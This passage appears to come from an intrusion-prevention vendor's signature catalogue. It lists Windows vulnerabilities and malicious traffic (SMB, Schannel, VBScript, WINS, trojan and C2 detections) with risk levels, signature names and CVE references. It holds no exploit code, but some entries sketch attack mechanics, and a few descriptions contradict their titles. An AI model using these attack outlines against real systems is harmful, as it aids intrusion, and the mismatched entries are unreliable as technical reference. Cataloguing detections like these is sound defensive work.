MSRPC-TCP_CPS-Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability

References:

CVE-2024-38258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38258

Windows-Remote-Desktop-Services-Remote-Code-Execution-CVE-2025-27480

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1864-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Windows

Software:

<os>

Type:

Race Condition

Description:

Windows Remote Desktop Service's remote code execution vulnerability CVE-2025-27480.

Situation:

Generic_UDP-DTLS-ClientHello-Request

References:

CVE-2025-27480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27480

ms25-apr
http://technet.microsoft.com/security/bulletin/ms25-apr

Windows-Remote-Directory-Listing

About this vulnerability:	Detects Windows Directory Listing
Risk:	Moderate
First detected in:	sgpkg-ips-119-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	Summary: A string "Volume Serial Number" is seen when directory listing command "dir" is executed within windows shell. This might be post-compromise behaviour - a remote attacker has compromised the host and wants to see the directory contents.
Situation:	Shared_Windows-Volume-Response-Detect-2 Shared_Windows-Unicode-Volume-Response-Detect-2

Windows-Remote-Management-Activity

About this vulnerability:	Windows Remote Management activity was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1219-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	Windows Remote Management activity was detected. In addition to normal administration activities, this kind of activity might indicate ongoing lateral movement in the infrastructure.
Situation:	HTTP_CS-Windows-Remote-Management-Activity

Windows-RPC-Locator-BOF-MS03-001

About this vulnerability:

RPC Locator buffer overflow (MS03-001)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000; Windows XP

Software:

RPC Locator

Type:

Buffer Overflow

Description:

Remote Procedure Call (RPC) Locator service suffers from a buffer overflow that can lead to code execution. Searching for an entry name makes a call to the unsafe wcscpy function, which if passed a long string, causes the buffer overflow. The vulnerable Locator Service is running by default on Windows NT and 2000 Domain Controllers.

Situation:

MSRPC-TCP_CPS-Rpc445-Locator-BOF-MS03-001

References:

CVE-2003-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0003

BID-6666
http://www.securityfocus.com/bid/6666

MS03-001
http://technet.microsoft.com/security/bulletin/MS03-001

Windows-RSH-Daemon-Buffer-Overflow

About this vulnerability:

A vulnerability in Windows RSH Daemon

Risk:

High

First detected in:

sgpkg-ips-485-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows RSH Daemon

Type:

Input Validation

Description:

There is a stack-based buffer overflow in Windows RSH Daemon.

Situation:

RSH_CS-Windows-RSH-Daemon-Buffer-Overflow

References:

CVE-2007-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4006

BID-24044
http://www.securityfocus.com/bid/24044

Windows-Schannel-Denial-Of-Service-CVE-2023-21818

About this vulnerability:

A vulnerability in Windows Schannel

Risk:

Moderate

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Schannel is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols in Windows. An out-of-bound read vulnerability has been identified in Schannel, which could be exploited to achieve remote information disclosure or denial-of-service.

Situation:

TLS_SS-Windows-Schannel-Denial-Of-Service-CVE-2023-21818

References:

CVE-2023-21818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21818

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819

About this vulnerability:

An attempt to exploit a vulnerability in Schannel detected

Risk:

High

First detected in:

sgpkg-ips-1556-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Windows

Software:

LSASS

Type:

Resource Starvation

Description:

Situation:

TLS_CS_Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819

References:

CVE-2023-21819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21819

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Windows-Script-File-Transfer

About this vulnerability:	A transfer of a Windows Script File (WSF) detected
Risk:	High
First detected in:	sgpkg-ips-1857-5242
Last changed:	sgpkg-ips-1857-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Windows Script File (WSF) has been commonly used by malicious actors to distribute malware onto victims' computers. Thus, by blocking such file, we effectively reduce one malware infection vector.
Situation:	File-Member-Name_Windows-Script-File-Transfer File-Name_Windows-Script-File-Transfer

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3205

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1336-5242

Platform:

Windows Vista; Windows 2008; Windows 2008 R2

Software:

Internet Explorer

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Text_Windows-Scripting-Engine-Memory-Corruption

References:

CVE-2016-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3205

MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3206

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1336-5242

Platform:

Windows Vista; Windows 2008; Windows 2008 R2

Software:

Internet Explorer

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Text_Windows-Scripting-Engine-Memory-Corruption

References:

CVE-2016-3206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3206

MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069

Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3207

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2008; Windows 2008 R2

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Text_Windows-Scripting-Engine-Memory-Corruption

References:

CVE-2016-3207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3207

MS16-069
http://technet.microsoft.com/security/bulletin/MS16-069

Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552

About this vulnerability:

A vulnerability in Windows Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in the Microsoft Windows VBScript engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552

References:

CVE-2018-8552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8552

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-1524-5242

Last changed:

sgpkg-ips-1524-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Windows detected.

Situation:

File-Text_Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118

References:

CVE-2022-41118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41118

ms22-nov
http://technet.microsoft.com/security/bulletin/ms22-nov

Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an out-of-bounds vulnerability in Windows Search Service.

Situation:

SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
SMB-TCP_Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543-2

References:

CVE-2017-8543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1763-5242

Last changed:

sgpkg-ips-1763-5242

Platform:

Windows

Software:

LSASS

Type:

Input Validation

Description:

An unauthenticated denial-of-service (DoS) in the Local Security Authority Subsystem Service (LSASS) has been identified that can lead to remote DoS of Windows systems.

Situation:

TLS_CS-Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148

References:

CVE-2024-38148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38148

ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug

Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Low

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Microsoft Windows Server for NFS. The vulnerability is caused by improper handling of NFS requests. A remote attacker can exploit the vulnerability by sending a malicious NFS request to the target server. Successful exploitation could result in information disclosure conditions.

Situation:

SunRPC_TCP-Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993

References:

CVE-2022-21993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21993

Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495

References:

CVE-2018-8495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this vulnerability:

Vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-323-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Windows Shell, a component of Microsoft Windows.

Situation:

HTTP_SS-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FR-Windows-Shell-Shortcut-Arbitrary-Code-Execution
SMB-TCP_FW-Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Binary_Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Binary_Windows-LNK-File-Transfer
File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer

References:

CVE-2010-2568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568

BID-41732
http://www.securityfocus.com/bid/41732

MS10-046
http://technet.microsoft.com/security/bulletin/MS10-046

Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in SMB message parsing.

Situation:

SMB-TCP_Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660

References:

CVE-2011-0660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0660

BID-47239
http://www.securityfocus.com/bid/47239

OSVDB-71772
http://www.osvdb.org/71772

MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019

Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of SMB protocol negotiation messages causes a vulnerability in Windows.

Situation:

SMB-TCP_CHS-Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642

References:

CVE-2024-43642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43642

Windows-SMB-Open2-Request-Error-Handling-Memory-Corruption

About this vulnerability:

Microsoft Windows SMB Server Trans2 Open2 Memory Corruption

Risk:

High

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in Microsoft Windows SMB services. The flaw is due to insufficient input validation when handling a SMB TRANS2 request. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, an attacked system will encounter an unrecoverable system error and display the Blue Screen of Death (BSoD). The target will halt or restart based on the configuration of system failure event handling. If the system is halted, it must be restarted manually by an administrator. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the System (Ring 0).

Situation:

SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-1
SMB-TCP_CHS-Open2-Buffer-Overflow-MS09-001-2

References:

CVE-2008-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4835

BID-33122
http://www.securityfocus.com/bid/33122

MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001

Windows-SMB-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in SMBv2 server.

Situation:

SMB-TCP_Windows-SMB-Remote-Code-Execution-Vulnerability

References:

CVE-2019-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0630

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Windows-SMB-Trans-Request-Error-Handling-Memory-Corruption

About this vulnerability:

Microsoft Windows SMB Server Trans Request Error Handling Memory Corruption

Risk:

High

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in Microsoft Windows SMB services. The flaw is due to insufficient input validation when handling SMB transactions. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, an attacked system will encounter an unrecoverable system error and display the Blue Screen of Death (BSoD). The target will halt or restart based on the configuration of system failure event handling. If the system is halted, it must be restarted manually by an administrator. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the System level.

Situation:

SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001
SMB-TCP_CHS-Transaction-Buffer-Overflow-MS09-001-2

References:

CVE-2008-4834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4834

BID-33121
http://www.securityfocus.com/bid/33121

MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001

Windows-Smbexec-Service-Create-Start-Command-Execution

About this vulnerability:	Command execution by means of creating and starting multiple Windows services with crafted commands
Risk:	Moderate
First detected in:	sgpkg-ips-1519-5242
Last changed:	sgpkg-ips-1519-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	This detects attempts of command execution by means of creating and starting multiple Windows services with crafted commands
Situation:	MSRPC-TCP_CPS-Windows-Smbexec-Service-Create-Start-Command-Execution

Windows-Task-Scheduler-Job-File-System-Compromise

About this vulnerability:

Viewing directories with invalid .job files allows arbitrary code execution

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Task Scheduler

Type:

Malfunction

Description:

Both explorer.exe and iexplore.exe parse .job files when showing them in a directory listing. The "to be executed" field is passed to wcscpy without bounds checking while parsing a .job files, allowing attackers to cause a buffer overflow and execute arbitrary code. A remote attack requires the victim to browse a directory that contains the malicious .job file.

Situation:

HTTP_SS-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_FR-Windows-Task-Scheduler-Job-File-System-Compromise
SMB-TCP_FW-Windows-Task-Scheduler-Job-File-System-Compromise
File-Binary_Windows-Task-Scheduler-Job-File-System-Compromise

References:

CVE-2004-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0212

BID-10708
http://www.securityfocus.com/bid/10708

MS04-022
http://technet.microsoft.com/security/bulletin/MS04-022

Windows-TCP-IP-Remote-Code-Execution-CVE-2024-38063

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1764-5242

Last changed:

sgpkg-ips-1764-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows TCP/IP stack's remote code execution vulnerability.

Situation:

IPv6_Extension-headers-incomplete
IPv6_Atomic-Fragment

References:

CVE-2024-38063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38063

ms24-aug
http://technet.microsoft.com/security/bulletin/ms24-aug

Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-624-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows Telnet service

Situation:

Telnet_CS-Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014

References:

CVE-2015-0014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0014

MS15-002
http://technet.microsoft.com/security/bulletin/MS15-002

Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an input validation vulnerability in Microsoft Windows. A remote attacker can use this vulnerability to execute arbitrary code on the affected system.

Situation:

File-Binary_Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413

References:

CVE-2018-8413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8413

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Windows-Theme-File-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-542-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-Text_Windows-Theme-File-Remote-Code-Execution-Vulnerability

References:

CVE-2013-0810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0810

MS13-071
http://technet.microsoft.com/security/bulletin/MS13-071

Windows-Theme-File-VisualStyles-SMB-Path

About this vulnerability:	Windows Theme file with a VisualStyles SMB path
Risk:	Moderate
First detected in:	sgpkg-ips-1634-5242
Last changed:	sgpkg-ips-1634-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	An attempt to exploit a vulnerability in Windows Theme File SMB Path detected.
Situation:	File-Text_Windows-Theme-File-VisualStyles-SMB-Path

Windows-URL-Zone-Check-Bypass-CVE-2023-29324

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1585-5242

Last changed:

sgpkg-ips-1585-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows URL zone check bypass vulnerability.

Situation:

File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-29324
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-29324

References:

CVE-2023-29324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29324

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

Windows-URL-Zone-Check-Bypass-CVE-2023-35384

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1619-5242

Last changed:

sgpkg-ips-1619-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows URL zone check bypass vulnerability.

Situation:

File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-35384
File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-35384

References:

CVE-2023-35384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35384

ms23-aug
http://technet.microsoft.com/security/bulletin/ms23-aug

Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544

About this vulnerability:

A vulnerability in Windows VBScript Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use after free vulnerability in Windows VBScript Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Windows-VBScript-Engine-Remote-Code-Execution-CVE-2018-8544

References:

CVE-2018-8544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8544

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Windows-VBScript-Engine-Remote-Code-Execution-Vulnerability-CVE-2018-8625

References:

CVE-2018-8625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8625

ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec

Windows-Visual-Studio-Code-Git-Extension-Argument-Injection

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code

Risk:

High

First detected in:

sgpkg-ips-1506-5242

Last changed:

sgpkg-ips-1506-5242

Platform:

Windows

Software:

Microsoft Visual Studio Code

Type:

Input Validation

Description:

An argument injection vulnerability exists in the Git Extension of Windows Visual Studio Code. The vulnerability is due to improper input validation of URL handlers. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted URL in Visual Studio Code. Successful exploitation results in the execution of arbitrary code under the security context of the target user.

Situation:

File-Text_Windows-Visual-Studio-Code-Git-Extension-Argument-Injection

References:

CVE-2022-30129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30129

Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code

Risk:

Moderate

First detected in:

sgpkg-ips-1542-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Windows

Software:

Microsoft Visual Studio Code

Type:

Input Validation

Description:

Improper input validation of .ipynb files causes a remote code execution vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected user.

Situation:

File-Text_Windows-Visual-Studio-Code-Jupyter-Notebook-Remote-Code-Execution

References:

CVE-2022-41034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41034

Windows-Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability

About this vulnerability:

A vulnerability in the Microsoft Windows VPN component.

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the Microsoft Windows VPN component, in multiple Microsoft Windows versions, which allows remote attackers to execute arbitrary code by sending crafted requests, due to improper handling of PPTP packets.

Situation:

PPTP_Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability

References:

CVE-2022-21972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21972

Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista SP2; Windows 2008; Windows 7 SP1; Windows 2008 R2; Windows 8.1; Windows 2012; Windows 2012 R2; Windows RT 8.1; Windows 10.1511; Windows 10.0

Software:

<os>

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge.

Situation:

NetBIOS-UDP_Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability

References:

CVE-2016-3236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236

MS16-077
http://technet.microsoft.com/security/bulletin/MS16-077

Windows_Xp_2003_Land_Attack_DoS

About this vulnerability:

Windows XP and 2003 land attack Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP2; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

Windows XP SP2 and Windows 2003 suffer from a denial of service vulnerability when receiving spoofed SYN packets from their own address.

Situation:

FTP_CS-Oversized-Nlst-Argument

References:

CVE-2005-0688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0688

MS06-064
http://technet.microsoft.com/security/bulletin/MS06-064

MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019

WinFTP-Nlst-Denial-of-Service

About this vulnerability:

A WinFTP Nlst Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Win FTP Server

Type:

Malfunction

Description:

A vulnerability in WinFTP Server, version 2.3.0, which allows remote attackers to cause a denial of service condition via an invalid NLST command.

Situation:

References:

CVE-2008-5666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5666

OSVDB-49043
http://www.osvdb.org/49043

Winhopstealer-Trojan

About this vulnerability:	Winhopstealer Trojan
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Winhopstealer trojan traffic.
Situation:	Generic_CS-Winhopstealer-Trojan

WinNuke-DoS

About this vulnerability:

WinNuke DoS attack

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows NT 3.5; Windows NT 4.0 SP0; Windows NT 4.0 SP1; Windows NT 4.0 SP2; Windows NT 4.0 SP3; SCO

Software:

<os>

Type:

Malfunction

Description:

Older versions of Microsoft Windows and SCO Open Server 5.0 have a vulnerability in the handling of "Out of Band" data in TCP/IP. This gives a remote attacker an opportunity for a denial of service (DoS) attack, as the target system crashes or loses the network connection.

Situation:

DOS_WINNUKE

References:

CVE-1999-0153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0153

BID-2010
http://www.securityfocus.com/bid/2010

OSVDB-1666
http://www.osvdb.org/1666

Winos4.0-Post-Exploitation-Framework-C2-Traffic

About this vulnerability:	Winos 4.0 post exploitation framework command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1801-5242
Last changed:	sgpkg-ips-1801-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Winos 4.0 is a post-exploitation framework with various command and control capabilities.
Situation:	Generic_CS-Winos4.0-Post-Exploitation-Framework-C2-Traffic

WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow

About this vulnerability:

A vulnerability in WinRadius

Risk:

Moderate

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WinRadius

Type:

Input Validation

Description:

There exists a denial of service vulnerability in WinRadius. The vulnerability is caused by the failure of WinRadius to validate the User-Password option size when parsing RADIUS Access-Requests. A remote attacker can exploit the vulnerability by a sending specially crafted RADIUS request to the target server, potentially causing a denial of service.

Situation:

Generic_UDP-WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow

References:

CVE-2012-3816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3816

BID-53702
http://www.securityfocus.com/bid/53702

WINS-Buffer-Overflow-2-MS09-039

About this vulnerability:

Buffer overflow vulnerability in WINS

Risk:

Moderate

First detected in:

sgpkg-ips-237-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Windows Internet Name Service (WINS) on Windows 2000/2003.

Situation:

WINS_Buffer-Overflow-2-MS09-039

References:

CVE-2009-1924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1924

MS09-039
http://technet.microsoft.com/security/bulletin/MS09-039

WINS-Buffer-Overflow-MS09-039

About this vulnerability:

Buffer overflow vulnerability in WINS

Risk:

Moderate

First detected in:

sgpkg-ips-237-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Windows Internet Name Service (WINS) on Windows 2000/2003.

Situation:

WINS_Buffer-Overflow-MS09-039

References:

CVE-2009-1923
